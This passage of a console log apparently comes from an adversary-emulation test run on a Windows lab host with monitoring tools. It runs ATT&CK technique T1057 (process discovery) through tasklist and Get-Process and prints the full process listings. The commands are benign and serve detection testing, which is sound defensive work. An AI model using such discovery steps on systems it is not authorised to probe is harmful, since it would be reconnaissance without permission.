1418 tasklist.exe
1419
1420Command Prompt:
1421 tasklist.exe
1422
1423
1424Image Name PID Session Name Session# Mem Usage
1425========================= ======== ================ =========== ============
1426System Idle Process 0 Services 0 8 K
1427System 4 Services 0 148 K
1428Registry 84 Services 0 12,248 K
1429smss.exe 440 Services 0 1,068 K
1430csrss.exe 588 Services 0 4,640 K
1431wininit.exe 660 Services 0 5,820 K
1432csrss.exe 672 Console 1 3,844 K
1433services.exe 728 Services 0 12,136 K
1434winlogon.exe 764 Console 1 8,228 K
1435lsass.exe 780 Services 0 44,672 K
1436fontdrvhost.exe 908 Console 1 2,796 K
1437fontdrvhost.exe 916 Services 0 2,936 K
1438svchost.exe 932 Services 0 3,600 K
1439svchost.exe 1004 Services 0 25,208 K
1440svchost.exe 524 Services 0 12,580 K
1441svchost.exe 676 Services 0 8,496 K
1442LogonUI.exe 8 Console 1 45,808 K
1443dwm.exe 1036 Console 1 24,224 K
1444svchost.exe 1128 Services 0 31,528 K
1445svchost.exe 1180 Services 0 9,004 K
1446svchost.exe 1188 Services 0 6,400 K
1447svchost.exe 1196 Services 0 6,612 K
1448svchost.exe 1204 Services 0 7,132 K
1449svchost.exe 1264 Services 0 11,028 K
1450svchost.exe 1288 Services 0 7,108 K
1451svchost.exe 1384 Services 0 7,708 K
1452svchost.exe 1412 Services 0 13,544 K
1453svchost.exe 1444 Services 0 24,028 K
1454svchost.exe 1464 Services 0 10,392 K
1455svchost.exe 1564 Services 0 8,812 K
1456svchost.exe 1572 Services 0 8,180 K
1457svchost.exe 1720 Services 0 7,408 K
1458svchost.exe 1736 Services 0 67,736 K
1459svchost.exe 1772 Services 0 5,316 K
1460svchost.exe 1828 Services 0 11,688 K
1461svchost.exe 1860 Services 0 14,352 K
1462svchost.exe 1928 Services 0 6,124 K
1463Memory Compression 2032 Services 0 32,160 K
1464svchost.exe 1680 Services 0 7,156 K
1465svchost.exe 2088 Services 0 7,404 K
1466svchost.exe 2096 Services 0 7,204 K
1467svchost.exe 2124 Services 0 7,972 K
1468svchost.exe 2208 Services 0 8,572 K
1469svchost.exe 2216 Services 0 10,536 K
1470svchost.exe 2356 Services 0 5,420 K
1471svchost.exe 2376 Services 0 7,332 K
1472svchost.exe 2428 Services 0 8,996 K
1473svchost.exe 2476 Services 0 10,664 K
1474svchost.exe 2512 Services 0 6,916 K
1475svchost.exe 2708 Services 0 6,228 K
1476svchost.exe 2716 Services 0 18,352 K
1477svchost.exe 2732 Services 0 5,992 K
1478spoolsv.exe 2740 Services 0 12,964 K
1479svchost.exe 2844 Services 0 10,788 K
1480amazon-ssm-agent.exe 2920 Services 0 10,776 K
1481svchost.exe 2928 Services 0 16,064 K
1482svchost.exe 2952 Services 0 17,836 K
1483LiteAgent.exe 2960 Services 0 4,252 K
1484svchost.exe 2968 Services 0 18,388 K
1485SecurityHealthService.exe 3008 Services 0 13,416 K
1486svchost.exe 3040 Services 0 8,100 K
1487svchost.exe 3060 Services 0 5,172 K
1488vulnservice.exe 1964 Services 0 11,372 K
1489svchost.exe 2176 Services 0 18,096 K
1490Ec2Config.exe 3260 Services 0 33,944 K
1491svchost.exe 3288 Services 0 5,032 K
1492svchost.exe 3640 Services 0 17,624 K
1493svchost.exe 4344 Services 0 20,300 K
1494svchost.exe 4496 Services 0 16,904 K
1495WmiPrvSE.exe 4512 Services 0 16,572 K
1496svchost.exe 3816 Services 0 17,236 K
1497svchost.exe 5220 Services 0 14,188 K
1498svchost.exe 5280 Services 0 12,992 K
1499svchost.exe 5468 Services 0 14,548 K
1500svchost.exe 5900 Services 0 6,768 K
1501sedsvc.exe 4060 Services 0 7,188 K
1502SgrmBroker.exe 2076 Services 0 3,768 K
1503svchost.exe 6032 Services 0 8,448 K
1504SearchIndexer.exe 5124 Services 0 33,080 K
1505svchost.exe 776 Services 0 5,360 K
1506svchost.exe 1020 Services 0 8,808 K
1507svchost.exe 4832 Services 0 7,664 K
1508svchost.exe 5876 Services 0 8,584 K
1509svchost.exe 2260 Services 0 6,028 K
1510csrss.exe 1032 RDP-Tcp#0 2 4,976 K
1511winlogon.exe 5420 RDP-Tcp#0 2 7,828 K
1512fontdrvhost.exe 972 RDP-Tcp#0 2 5,036 K
1513dwm.exe 3068 RDP-Tcp#0 2 59,104 K
1514svchost.exe 4328 Services 0 6,096 K
1515rdpclip.exe 3812 RDP-Tcp#0 2 9,044 K
1516sihost.exe 5904 RDP-Tcp#0 2 22,172 K
1517svchost.exe 5564 RDP-Tcp#0 2 14,308 K
1518svchost.exe 5348 RDP-Tcp#0 2 28,824 K
1519taskhostw.exe 1556 RDP-Tcp#0 2 17,252 K
1520svchost.exe 4944 Services 0 7,280 K
1521ctfmon.exe 3220 RDP-Tcp#0 2 14,604 K
1522explorer.exe 2384 RDP-Tcp#0 2 92,360 K
1523dllhost.exe 4000 RDP-Tcp#0 2 6,996 K
1524ShellExperienceHost.exe 6272 RDP-Tcp#0 2 65,308 K
1525SearchUI.exe 6448 RDP-Tcp#0 2 180,452 K
1526RuntimeBroker.exe 6596 RDP-Tcp#0 2 19,836 K
1527RuntimeBroker.exe 6812 RDP-Tcp#0 2 28,524 K
1528ApplicationFrameHost.exe 6856 RDP-Tcp#0 2 22,324 K
1529MicrosoftEdge.exe 7152 RDP-Tcp#0 2 60,732 K
1530browser_broker.exe 3876 RDP-Tcp#0 2 9,756 K
1531svchost.exe 6936 Services 0 6,240 K
1532Windows.WARP.JITService.e 7284 Services 0 4,576 K
1533RuntimeBroker.exe 7448 RDP-Tcp#0 2 6,444 K
1534MicrosoftEdgeCP.exe 7624 RDP-Tcp#0 2 25,088 K
1535MicrosoftEdgeCP.exe 7664 RDP-Tcp#0 2 22,552 K
1536svchost.exe 8120 Services 0 10,064 K
1537RuntimeBroker.exe 8140 RDP-Tcp#0 2 22,420 K
1538MSASCuiL.exe 6796 RDP-Tcp#0 2 8,220 K
1539OneDrive.exe 5712 RDP-Tcp#0 2 52,972 K
1540svchost.exe 1228 RDP-Tcp#0 2 10,440 K
1541dllhost.exe 8580 RDP-Tcp#0 2 9,376 K
1542powershell.exe 8256 RDP-Tcp#0 2 217,956 K
1543conhost.exe 2880 RDP-Tcp#0 2 13,936 K
1544cmd.exe 8920 RDP-Tcp#0 2 2,872 K
1545conhost.exe 8888 RDP-Tcp#0 2 14,768 K
1546powershell.exe 3632 RDP-Tcp#0 2 124,100 K
1547Sysmon64.exe 2240 Services 0 21,672 K
1548unsecapp.exe 5156 Services 0 6,204 K
1549Simplerity.Service.exe 8204 Services 0 56,632 K
1550osqueryd.exe 6512 Services 0 15,288 K
1551packetbeat.exe 8996 Services 0 56,304 K
1552osqueryd.exe 5932 Services 0 660 K
1553conhost.exe 8504 Services 0 460 K
1554atom.exe 8784 RDP-Tcp#0 2 216,316 K
1555atom.exe 4736 RDP-Tcp#0 2 12,644 K
1556atom.exe 8820 RDP-Tcp#0 2 214,780 K
1557atom.exe 6804 RDP-Tcp#0 2 140,764 K
1558Taskmgr.exe 8340 RDP-Tcp#0 2 39,344 K
1559winlogbeat.exe 3376 Services 0 37,920 K
1560SearchProtocolHost.exe 6136 Services 0 9,324 K
1561audiodg.exe 4596 Services 0 13,984 K
1562SearchFilterHost.exe 7800 Services 0 6,604 K
1563svchost.exe 4412 Services 0 20,300 K
1564VSSVC.exe 1408 Services 0 7,772 K
1565svchost.exe 6188 Services 0 7,124 K
1566WmiPrvSE.exe 4796 Services 0 8,716 K
1567wbengine.exe 5692 Services 0 8,784 K
1568vds.exe 5880 Services 0 9,924 K
1569cmd.exe 5940 RDP-Tcp#0 2 2,592 K
1570tasklist.exe 2312 RDP-Tcp#0 2 7,288 K
1571Determining tests for Windows
1572Determining manual tests
1573[********BEGIN TEST*******]
1574Process Discovery T1057
1575Process Discovery - tasklist
1576Process Discovery using tasklist.exe
1577
1578Invoking Atomic Tests using defined executor
1579Performing the operation "Execute Atomic Test" on target "Process Discovery - tasklist".
1580Command Prompt:
1581 tasklist.exe
1582
1583Command Prompt:
1584 tasklist.exe
1585
1586
1587Image Name PID Session Name Session# Mem Usage
1588========================= ======== ================ =========== ============
1589System Idle Process 0 Services 0 8 K
1590System 4 Services 0 148 K
1591Registry 84 Services 0 12,252 K
1592smss.exe 440 Services 0 1,068 K
1593csrss.exe 588 Services 0 4,640 K
1594wininit.exe 660 Services 0 5,820 K
1595csrss.exe 672 Console 1 3,844 K
1596services.exe 728 Services 0 12,136 K
1597winlogon.exe 764 Console 1 8,228 K
1598lsass.exe 780 Services 0 44,672 K
1599fontdrvhost.exe 908 Console 1 2,796 K
1600fontdrvhost.exe 916 Services 0 2,936 K
1601svchost.exe 932 Services 0 3,600 K
1602svchost.exe 1004 Services 0 25,208 K
1603svchost.exe 524 Services 0 12,580 K
1604svchost.exe 676 Services 0 8,496 K
1605LogonUI.exe 8 Console 1 45,808 K
1606dwm.exe 1036 Console 1 24,224 K
1607svchost.exe 1128 Services 0 31,528 K
1608svchost.exe 1180 Services 0 9,004 K
1609svchost.exe 1188 Services 0 6,400 K
1610svchost.exe 1196 Services 0 6,612 K
1611svchost.exe 1204 Services 0 7,132 K
1612svchost.exe 1264 Services 0 11,028 K
1613svchost.exe 1288 Services 0 7,108 K
1614svchost.exe 1384 Services 0 7,708 K
1615svchost.exe 1412 Services 0 13,544 K
1616svchost.exe 1444 Services 0 24,176 K
1617svchost.exe 1464 Services 0 10,392 K
1618svchost.exe 1564 Services 0 8,812 K
1619svchost.exe 1572 Services 0 8,180 K
1620svchost.exe 1720 Services 0 7,408 K
1621svchost.exe 1736 Services 0 67,800 K
1622svchost.exe 1772 Services 0 5,316 K
1623svchost.exe 1828 Services 0 11,688 K
1624svchost.exe 1860 Services 0 14,352 K
1625svchost.exe 1928 Services 0 6,124 K
1626Memory Compression 2032 Services 0 32,160 K
1627svchost.exe 1680 Services 0 7,156 K
1628svchost.exe 2088 Services 0 7,404 K
1629svchost.exe 2096 Services 0 7,204 K
1630svchost.exe 2124 Services 0 7,972 K
1631svchost.exe 2208 Services 0 8,572 K
1632svchost.exe 2216 Services 0 10,536 K
1633svchost.exe 2356 Services 0 5,420 K
1634svchost.exe 2376 Services 0 7,332 K
1635svchost.exe 2428 Services 0 8,996 K
1636svchost.exe 2476 Services 0 10,664 K
1637svchost.exe 2512 Services 0 6,916 K
1638svchost.exe 2708 Services 0 6,228 K
1639svchost.exe 2716 Services 0 18,548 K
1640svchost.exe 2732 Services 0 5,992 K
1641spoolsv.exe 2740 Services 0 12,964 K
1642svchost.exe 2844 Services 0 10,788 K
1643amazon-ssm-agent.exe 2920 Services 0 10,776 K
1644svchost.exe 2928 Services 0 16,064 K
1645svchost.exe 2952 Services 0 17,836 K
1646LiteAgent.exe 2960 Services 0 4,252 K
1647svchost.exe 2968 Services 0 18,388 K
1648SecurityHealthService.exe 3008 Services 0 13,416 K
1649svchost.exe 3040 Services 0 8,100 K
1650svchost.exe 3060 Services 0 5,172 K
1651vulnservice.exe 1964 Services 0 11,372 K
1652svchost.exe 2176 Services 0 18,096 K
1653Ec2Config.exe 3260 Services 0 33,944 K
1654svchost.exe 3288 Services 0 5,032 K
1655svchost.exe 3640 Services 0 17,624 K
1656svchost.exe 4344 Services 0 20,300 K
1657svchost.exe 4496 Services 0 17,068 K
1658WmiPrvSE.exe 4512 Services 0 16,572 K
1659svchost.exe 3816 Services 0 17,236 K
1660svchost.exe 5220 Services 0 14,188 K
1661svchost.exe 5280 Services 0 12,992 K
1662svchost.exe 5468 Services 0 14,548 K
1663svchost.exe 5900 Services 0 6,768 K
1664sedsvc.exe 4060 Services 0 7,188 K
1665SgrmBroker.exe 2076 Services 0 3,768 K
1666svchost.exe 6032 Services 0 8,448 K
1667SearchIndexer.exe 5124 Services 0 33,080 K
1668svchost.exe 776 Services 0 5,360 K
1669svchost.exe 1020 Services 0 8,808 K
1670svchost.exe 4832 Services 0 7,664 K
1671svchost.exe 5876 Services 0 8,584 K
1672svchost.exe 2260 Services 0 6,028 K
1673csrss.exe 1032 RDP-Tcp#0 2 4,976 K
1674winlogon.exe 5420 RDP-Tcp#0 2 7,828 K
1675fontdrvhost.exe 972 RDP-Tcp#0 2 5,036 K
1676dwm.exe 3068 RDP-Tcp#0 2 59,104 K
1677svchost.exe 4328 Services 0 6,096 K
1678rdpclip.exe 3812 RDP-Tcp#0 2 9,044 K
1679sihost.exe 5904 RDP-Tcp#0 2 22,172 K
1680svchost.exe 5564 RDP-Tcp#0 2 14,308 K
1681svchost.exe 5348 RDP-Tcp#0 2 28,824 K
1682taskhostw.exe 1556 RDP-Tcp#0 2 17,252 K
1683svchost.exe 4944 Services 0 7,280 K
1684ctfmon.exe 3220 RDP-Tcp#0 2 14,604 K
1685explorer.exe 2384 RDP-Tcp#0 2 92,360 K
1686dllhost.exe 4000 RDP-Tcp#0 2 6,996 K
1687ShellExperienceHost.exe 6272 RDP-Tcp#0 2 65,308 K
1688SearchUI.exe 6448 RDP-Tcp#0 2 180,452 K
1689RuntimeBroker.exe 6596 RDP-Tcp#0 2 19,836 K
1690RuntimeBroker.exe 6812 RDP-Tcp#0 2 28,524 K
1691ApplicationFrameHost.exe 6856 RDP-Tcp#0 2 22,324 K
1692MicrosoftEdge.exe 7152 RDP-Tcp#0 2 60,732 K
1693browser_broker.exe 3876 RDP-Tcp#0 2 9,756 K
1694svchost.exe 6936 Services 0 6,240 K
1695Windows.WARP.JITService.e 7284 Services 0 4,576 K
1696RuntimeBroker.exe 7448 RDP-Tcp#0 2 6,444 K
1697MicrosoftEdgeCP.exe 7624 RDP-Tcp#0 2 25,088 K
1698MicrosoftEdgeCP.exe 7664 RDP-Tcp#0 2 22,552 K
1699svchost.exe 8120 Services 0 10,064 K
1700RuntimeBroker.exe 8140 RDP-Tcp#0 2 22,420 K
1701MSASCuiL.exe 6796 RDP-Tcp#0 2 8,220 K
1702OneDrive.exe 5712 RDP-Tcp#0 2 52,972 K
1703svchost.exe 1228 RDP-Tcp#0 2 10,440 K
1704dllhost.exe 8580 RDP-Tcp#0 2 9,376 K
1705powershell.exe 8256 RDP-Tcp#0 2 213,416 K
1706conhost.exe 2880 RDP-Tcp#0 2 13,936 K
1707cmd.exe 8920 RDP-Tcp#0 2 2,872 K
1708conhost.exe 8888 RDP-Tcp#0 2 14,836 K
1709powershell.exe 3632 RDP-Tcp#0 2 124,164 K
1710Sysmon64.exe 2240 Services 0 21,672 K
1711unsecapp.exe 5156 Services 0 6,204 K
1712Simplerity.Service.exe 8204 Services 0 56,632 K
1713osqueryd.exe 6512 Services 0 15,288 K
1714packetbeat.exe 8996 Services 0 56,304 K
1715osqueryd.exe 5932 Services 0 664 K
1716conhost.exe 8504 Services 0 460 K
1717atom.exe 8784 RDP-Tcp#0 2 216,328 K
1718atom.exe 4736 RDP-Tcp#0 2 12,644 K
1719atom.exe 8820 RDP-Tcp#0 2 214,780 K
1720atom.exe 6804 RDP-Tcp#0 2 140,764 K
1721Taskmgr.exe 8340 RDP-Tcp#0 2 39,344 K
1722winlogbeat.exe 3376 Services 0 37,920 K
1723SearchProtocolHost.exe 6136 Services 0 9,324 K
1724audiodg.exe 4596 Services 0 13,984 K
1725SearchFilterHost.exe 7800 Services 0 6,604 K
1726svchost.exe 4412 Services 0 20,300 K
1727VSSVC.exe 1408 Services 0 7,772 K
1728svchost.exe 6188 Services 0 7,124 K
1729WmiPrvSE.exe 4796 Services 0 9,592 K
1730wbengine.exe 5692 Services 0 8,784 K
1731vds.exe 5880 Services 0 9,924 K
1732cmd.exe 5484 RDP-Tcp#0 2 2,592 K
1733tasklist.exe 8280 RDP-Tcp#0 2 7,276 K
1734Determining tests for Windows
1735Determining manual tests
1736[********BEGIN TEST*******]
1737Process Discovery T1057
1738Process Discovery - Get-Process
1739Process Discovery using tasklist.exe
1740
1741Invoking Atomic Tests using defined executor
1742Performing the operation "Execute Atomic Test" on target "Process Discovery - Get-Process".
1743PowerShell:
1744 Get-Process
1745PowerShell
1746 Get-Process
1747
1748Id : 2920
1749Handles : 133
1750CPU : 0.140625
1751SI : 0
1752Name : amazon-ssm-agent
1753
1754
1755Id : 6856
1756Handles : 311
1757CPU : 0.140625
1758SI : 2
1759Name : ApplicationFrameHost
1760
1761
1762Id : 4736
1763Handles : 206
1764CPU : 0
1765SI : 2
1766Name : atom
1767
1768
1769Id : 6804
1770Handles : 298
1771CPU : 0.71875
1772SI : 2
1773Name : atom
1774
1775
1776Id : 8784
1777Handles : 871
1778CPU : 9.265625
1779SI : 2
1780Name : atom
1781
1782
1783Id : 8820
1784Handles : 515
1785CPU : 7.6875
1786SI : 2
1787Name : atom
1788
1789
1790Id : 4596
1791Handles : 260
1792CPU : 0.0625
1793SI : 0
1794Name : audiodg
1795
1796
1797Id : 3876
1798Handles : 186
1799CPU : 0.03125
1800SI : 2
1801Name : browser_broker
1802
1803
1804Id : 8920
1805Handles : 49
1806CPU : 0.03125
1807SI : 2
1808Name : cmd
1809
1810
1811Id : 2880
1812Handles : 241
1813CPU : 1.9375
1814SI : 2
1815Name : conhost
1816
1817
1818Id : 8504
1819Handles : 137
1820CPU : 0
1821SI : 0
1822Name : conhost
1823
1824
1825Id : 8888
1826Handles : 241
1827CPU : 2.109375
1828SI : 2
1829Name : conhost
1830
1831
1832Id : 588
1833Handles : 547
1834CPU : 0.640625
1835SI : 0
1836Name : csrss
1837
1838
1839Id : 672
1840Handles : 162
1841CPU : 0.15625
1842SI : 1
1843Name : csrss
1844
1845
1846Id : 1032
1847Handles : 521
1848CPU : 1.03125
1849SI : 2
1850Name : csrss
1851
1852
1853Id : 3220
1854Handles : 365
1855CPU : 3.078125
1856SI : 2
1857Name : ctfmon
1858
1859
1860Id : 4000
1861Handles : 128
1862CPU : 0.0625
1863SI : 2
1864Name : dllhost
1865
1866
1867Id : 8580
1868Handles : 164
1869CPU : 0.09375
1870SI : 2
1871Name : dllhost
1872
1873
1874Id : 1036
1875Handles : 497
1876CPU : 0.09375
1877SI : 1
1878Name : dwm
1879
1880
1881Id : 3068
1882Handles : 618
1883CPU : 2.796875
1884SI : 2
1885Name : dwm
1886
1887
1888Id : 3260
1889Handles : 521
1890CPU : 0.796875
1891SI : 0
1892Name : Ec2Config
1893
1894
1895Id : 2384
1896Handles : 2012
1897CPU : 7.296875
1898SI : 2
1899Name : explorer
1900
1901
1902Id : 908
1903Handles : 45
1904CPU : 0
1905SI : 1
1906Name : fontdrvhost
1907
1908
1909Id : 916
1910Handles : 45
1911CPU : 0.03125
1912SI : 0
1913Name : fontdrvhost
1914
1915
1916Id : 972
1917Handles : 45
1918CPU : 0.125
1919SI : 2
1920Name : fontdrvhost
1921
1922
1923Id : 0
1924Handles : 0
1925CPU :
1926SI : 0
1927Name : Idle
1928
1929
1930Id : 2960
1931Handles : 76
1932CPU : 0.015625
1933SI : 0
1934Name : LiteAgent
1935
1936
1937Id : 8
1938Handles : 683
1939CPU : 0.4375
1940SI : 1
1941Name : LogonUI
1942
1943
1944Id : 780
1945Handles : 1665
1946CPU : 12.390625
1947SI : 0
1948Name : lsass
1949
1950
1951Id : 2032
1952Handles : 0
1953CPU : 0.796875
1954SI : 0
1955Name : Memory Compression
1956
1957
1958Id : 7152
1959Handles : 975
1960CPU : 0.46875
1961SI : 2
1962Name : MicrosoftEdge
1963
1964
1965Id : 7624
1966Handles : 503
1967CPU : 0.140625
1968SI : 2
1969Name : MicrosoftEdgeCP
1970
1971
1972Id : 7664
1973Handles : 398
1974CPU : 0.109375
1975SI : 2
1976Name : MicrosoftEdgeCP
1977
1978
1979Id : 6796
1980Handles : 159
1981CPU : 0.03125
1982SI : 2
1983Name : MSASCuiL
1984
1985
1986Id : 5712
1987Handles : 652
1988CPU : 0.828125
1989SI : 2
1990Name : OneDrive
1991
1992
1993Id : 5932
1994Handles : 397
1995CPU : 0.484375
1996SI : 0
1997Name : osqueryd
1998
1999
2000Id : 6512
2001Handles : 305
2002CPU : 7.359375
2003SI : 0
2004Name : osqueryd
2005
2006
2007Id : 8996
2008Handles : 263
2009CPU : 1.578125
2010SI : 0
2011Name : packetbeat
2012
2013
2014Id : 3632
2015Handles : 907
2016CPU : 3.46875
2017SI : 2
2018Name : powershell
2019
2020
2021Id : 8256
2022Handles : 1439
2023CPU : 23.546875
2024SI : 2
2025Name : powershell
2026
2027
2028Id : 3812
2029Handles : 283
2030CPU : 0.46875
2031SI : 2
2032Name : rdpclip
2033
2034
2035Id : 84
2036Handles : 0
2037CPU : 0.828125
2038SI : 0
2039Name : Registry
2040
2041
2042Id : 6596
2043Handles : 266
2044CPU : 1.28125
2045SI : 2
2046Name : RuntimeBroker
2047
2048
2049Id : 6812
2050Handles : 538
2051CPU : 2.0625
2052SI : 2
2053Name : RuntimeBroker
2054
2055
2056Id : 7448
2057Handles : 140
2058CPU : 0.015625
2059SI : 2
2060Name : RuntimeBroker
2061
2062
2063Id : 8140
2064Handles : 438
2065CPU : 2.15625
2066SI : 2
2067Name : RuntimeBroker
2068
2069
2070Id : 7800
2071Handles : 138
2072CPU : 0.03125
2073SI : 0
2074Name : SearchFilterHost
2075
2076
2077Id : 5124
2078Handles : 724
2079CPU : 10.1875
2080SI : 0
2081Name : SearchIndexer
2082
2083
2084Id : 6136
2085Handles : 363
2086CPU : 0.046875
2087SI : 0
2088Name : SearchProtocolHost
2089
2090
2091Id : 6448
2092Handles : 1427
2093CPU : 13.203125
2094SI : 2
2095Name : SearchUI
2096
2097
2098Id : 3008
2099Handles : 373
2100CPU : 0.21875
2101SI : 0
2102Name : SecurityHealthService
2103
2104
2105Id : 4060
2106Handles : 148
2107CPU : 0.15625
2108SI : 0
2109Name : sedsvc
2110
2111
2112Id : 728
2113Handles : 681
2114CPU : 4.59375
2115SI : 0
2116Name : services
2117
2118
2119Id : 2076
2120Handles : 65
2121CPU : 0.015625
2122SI : 0
2123Name : SgrmBroker
2124
2125
2126Id : 6272
2127Handles : 705
2128CPU : 1.34375
2129SI : 2
2130Name : ShellExperienceHost
2131
2132
2133Id : 5904
2134Handles : 643
2135CPU : 4.359375
2136SI : 2
2137Name : sihost
2138
2139
2140Id : 8204
2141Handles : 721
2142CPU : 2.78125
2143SI : 0
2144Name : Simplerity.Service
2145
2146
2147Id : 440
2148Handles : 55
2149CPU : 0.15625
2150SI : 0
2151Name : smss
2152
2153
2154Id : 2740
2155Handles : 448
2156CPU : 0.515625
2157SI : 0
2158Name : spoolsv
2159
2160
2161Id : 524
2162Handles : 1092
2163CPU : 7.40625
2164SI : 0
2165Name : svchost
2166
2167
2168Id : 676
2169Handles : 337
2170CPU : 0.75
2171SI : 0
2172Name : svchost
2173
2174
2175Id : 776
2176Handles : 118
2177CPU : 0.03125
2178SI : 0
2179Name : svchost
2180
2181
2182Id : 932
2183Handles : 84
2184CPU : 0.015625
2185SI : 0
2186Name : svchost
2187
2188
2189Id : 1004
2190Handles : 1006
2191CPU : 4.890625
2192SI : 0
2193Name : svchost
2194
2195
2196Id : 1020
2197Handles : 197
2198CPU : 0.25
2199SI : 0
2200Name : svchost
2201
2202
2203Id : 1128
2204Handles : 814
2205CPU : 3.375
2206SI : 0
2207Name : svchost
2208
2209
2210Id : 1180
2211Handles : 186
2212CPU : 0.09375
2213SI : 0
2214Name : svchost
2215
2216
2217Id : 1188
2218Handles : 166
2219CPU : 0.015625
2220SI : 0
2221Name : svchost
2222
2223
2224Id : 1196
2225Handles : 135
2226CPU : 0.140625
2227SI : 0
2228Name : svchost
2229
2230
2231Id : 1204
2232Handles : 206
2233CPU : 0.046875
2234SI : 0
2235Name : svchost
2236
2237
2238Id : 1228
2239Handles : 229
2240CPU : 0.078125
2241SI : 2
2242Name : svchost
2243
2244
2245Id : 1264
2246Handles : 157
2247CPU : 0.0625
2248SI : 0
2249Name : svchost
2250
2251
2252Id : 1288
2253Handles : 207
2254CPU : 0.375
2255SI : 0
2256Name : svchost
2257
2258
2259Id : 1384
2260Handles : 233
2261CPU : 0.3125
2262SI : 0
2263Name : svchost
2264
2265
2266Id : 1412
2267Handles : 400
2268CPU : 0.890625
2269SI : 0
2270Name : svchost
2271
2272
2273Id : 1444
2274Handles : 528
2275CPU : 225.984375
2276SI : 0
2277Name : svchost
2278
2279
2280Id : 1464
2281Handles : 239
2282CPU : 0.140625
2283SI : 0
2284Name : svchost
2285
2286
2287Id : 1564
2288Handles : 220
2289CPU : 0.4375
2290SI : 0
2291Name : svchost
2292
2293
2294Id : 1572
2295Handles : 224
2296CPU : 0.03125
2297SI : 0
2298Name : svchost
2299
2300
2301Id : 1680
2302Handles : 158
2303CPU : 0.03125
2304SI : 0
2305Name : svchost
2306
2307
2308Id : 1720
2309Handles : 181
2310CPU : 0.078125
2311SI : 0
2312Name : svchost
2313
2314
2315Id : 1736
2316Handles : 189
2317CPU : 22.5625
2318SI : 0
2319Name : svchost
2320
2321
2322Id : 1772
2323Handles : 182
2324CPU : 0.078125
2325SI : 0
2326Name : svchost
2327
2328
2329Id : 1828
2330Handles : 383
2331CPU : 0.09375
2332SI : 0
2333Name : svchost
2334
2335
2336Id : 1860
2337Handles : 455
2338CPU : 1.234375
2339SI : 0
2340Name : svchost
2341
2342
2343Id : 1928
2344Handles : 179
2345CPU : 0.03125
2346SI : 0
2347Name : svchost
2348
2349
2350Id : 2088
2351Handles : 157
2352CPU : 0.03125
2353SI : 0
2354Name : svchost
2355
2356
2357Id : 2096
2358Handles : 164
2359CPU : 0.203125
2360SI : 0
2361Name : svchost
2362
2363
2364Id : 2124
2365Handles : 384
2366CPU : 0.828125
2367SI : 0
2368Name : svchost
2369
2370
2371Id : 2176
2372Handles : 369
2373CPU : 0.15625
2374SI : 0
2375Name : svchost
2376
2377
2378Id : 2208
2379Handles : 212
2380CPU : 0.046875
2381SI : 0
2382Name : svchost
2383
2384
2385Id : 2216
2386Handles : 276
2387CPU : 0.09375
2388SI : 0
2389Name : svchost
2390
2391
2392Id : 2260
2393Handles : 129
2394CPU : 0.046875
2395SI : 0
2396Name : svchost
2397
2398
2399Id : 2356
2400Handles : 127
2401CPU : 0
2402SI : 0
2403Name : svchost
2404
2405
2406Id : 2376
2407Handles : 290
2408CPU : 0.078125
2409SI : 0
2410Name : svchost
2411
2412
2413Id : 2428
2414Handles : 248
2415CPU : 0.0625
2416SI : 0
2417Name : svchost
2418
2419
2420Id : 2476
2421Handles : 186
2422CPU : 0.0625
2423SI : 0
2424Name : svchost
2425
2426
2427Id : 2512
2428Handles : 174
2429CPU : 80.359375
2430SI : 0
2431Name : svchost
2432
2433
2434Id : 2708
2435Handles : 232
2436CPU : 0.015625
2437SI : 0
2438Name : svchost
2439
2440
2441Id : 2716
2442Handles : 525
2443CPU : 9.6875
2444SI : 0
2445Name : svchost
2446
2447
2448Id : 2732
2449Handles : 149
2450CPU : 0.140625
2451SI : 0
2452Name : svchost
2453
2454
2455Id : 2844
2456Handles : 453
2457CPU : 0.0625
2458SI : 0
2459Name : svchost
2460
2461
2462Id : 2928
2463Handles : 350
2464CPU : 0.75
2465SI : 0
2466Name : svchost
2467
2468
2469Id : 2952
2470Handles : 317
2471CPU : 0.328125
2472SI : 0
2473Name : svchost
2474
2475
2476Id : 2968
2477Handles : 538
2478CPU : 0.78125
2479SI : 0
2480Name : svchost
2481
2482
2483Id : 3040
2484Handles : 201
2485CPU : 0.34375
2486SI : 0
2487Name : svchost
2488
2489
2490Id : 3060
2491Handles : 122
2492CPU : 0.015625
2493SI : 0
2494Name : svchost
2495
2496
2497Id : 3288
2498Handles : 103
2499CPU : 0.03125
2500SI : 0
2501Name : svchost
2502
2503
2504Id : 3640
2505Handles : 278
2506CPU : 0.09375
2507SI : 0
2508Name : svchost
2509
2510
2511Id : 3816
2512Handles : 612
2513CPU : 6.03125
2514SI : 0
2515Name : svchost
2516
2517
2518Id : 4328
2519Handles : 138
2520CPU : 0.046875
2521SI : 0
2522Name : svchost
2523
2524
2525Id : 4344
2526Handles : 579
2527CPU : 35.5625
2528SI : 0
2529Name : svchost
2530
2531
2532Id : 4412
2533Handles : 405
2534CPU : 0.0625
2535SI : 0
2536Name : svchost
2537
2538
2539Id : 4496
2540Handles : 516
2541CPU : 752.53125
2542SI : 0
2543Name : svchost
2544
2545
2546Id : 4832
2547Handles : 171
2548CPU : 1.484375
2549SI : 0
2550Name : svchost
2551
2552
2553Id : 4944
2554Handles : 160
2555CPU : 0.03125
2556SI : 0
2557Name : svchost
2558
2559
2560Id : 5220
2561Handles : 262
2562CPU : 1.53125
2563SI : 0
2564Name : svchost
2565
2566
2567Id : 5280
2568Handles : 181
2569CPU : 7.65625
2570SI : 0
2571Name : svchost
2572
2573
2574Id : 5348
2575Handles : 448
2576CPU : 0.78125
2577SI : 2
2578Name : svchost
2579
2580
2581Id : 5468
2582Handles : 278
2583CPU : 0.0625
2584SI : 0
2585Name : svchost
2586
2587
2588Id : 5564
2589Handles : 252
2590CPU : 0.46875
2591SI : 2
2592Name : svchost
2593
2594
2595Id : 5876
2596Handles : 195
2597CPU : 0.046875
2598SI : 0
2599Name : svchost
2600
2601
2602Id : 5900
2603Handles : 211
2604CPU : 0.0625
2605SI : 0
2606Name : svchost
2607
2608
2609Id : 6032
2610Handles : 198
2611CPU : 0.109375
2612SI : 0
2613Name : svchost
2614
2615
2616Id : 6188
2617Handles : 129
2618CPU : 0.03125
2619SI : 0
2620Name : svchost
2621
2622
2623Id : 6936
2624Handles : 142
2625CPU : 0.09375
2626SI : 0
2627Name : svchost
2628
2629
2630Id : 8120
2631Handles : 262
2632CPU : 0.046875
2633SI : 0
2634Name : svchost
2635
2636
2637Id : 2240
2638Handles : 425
2639CPU : 60.703125
2640SI : 0
2641Name : Sysmon64
2642
2643
2644Id : 4
2645Handles : 3124
2646CPU : 145.625
2647SI : 0
2648Name : System
2649
2650
